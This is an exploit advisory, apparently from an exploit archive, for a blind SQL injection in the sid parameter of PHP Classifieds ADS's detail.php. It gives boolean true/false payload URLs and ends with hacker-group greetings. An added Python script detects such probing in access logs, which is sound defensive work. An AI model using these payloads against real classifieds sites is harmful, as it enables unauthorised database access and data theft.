
# Title : PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability
# Published : 2010-09-04
# Author : BorN To K!LL


[~] Title:    PHP CLASSIFIEDS ADS
[~] Price:   $49
[~] Link :   http://www.sellatsite.com/sellatsite/phpclass.asp
[~] Author:    BorN To K!LL - h4ck3r
[~] 3xploit:

/detail.php?sid=[Blind-Injection]

[~] 3xample:

http://www.example.com/classi/detail.php?sid=80 and 1=1--    // True

http://www.example.com/classi/detail.php?sid=80 and 1=2--    // False
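
[~] Detection (added example, not part of the original advisory): a log check that flags detail.php requests whose sid is not a plain integer, and lists clients whose malformed requests drew different response sizes, which is the true/false difference shown above. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Sep/2010:10:00:01 +0000] "GET /classi/detail.php?sid=80 HTTP/1.1" 200 5120
203.0.113.9 - - [04/Sep/2010:10:00:07 +0000] "GET /classi/detail.php?sid=80%20and%201=1-- HTTP/1.1" 200 5120
203.0.113.9 - - [04/Sep/2010:10:00:08 +0000] "GET /classi/detail.php?sid=80+and+1=2-- HTTP/1.1" 200 1033
198.51.100.2 - - [04/Sep/2010:10:01:00 +0000] "GET /classi/index.php?page=2 HTTP/1.1" 200 900
"""

# client, request target, status code, response size
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')


def suspicious_sid_requests(log_text):
    """Return (client, decoded sid, status, size) for detail.php hits with a non-integer sid."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/detail.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for sid in parse_qs(url.query, keep_blank_values=True).get("sid", []):
            if not re.fullmatch(r"\d+", sid):
                hits.append((client, sid, int(status), int(size)))
    return hits


def blind_probe_clients(hits):
    """Clients whose malformed sid requests got differing response sizes (a true/false pattern)."""
    sizes = {}
    for client, _sid, _status, size in hits:
        sizes.setdefault(client, set()).add(size)
    return sorted(c for c, s in sizes.items() if len(s) > 1)


if __name__ == "__main__":
    found = suspicious_sid_requests(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("possible blind probing from:", blind_probe_clients(found))
```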

[~] Greetings:

string Greetings[x] = ("Dr.2" , "Q8 H4x0r" , "AsbMay's Group" , "darkc0de team" , "and all my friends");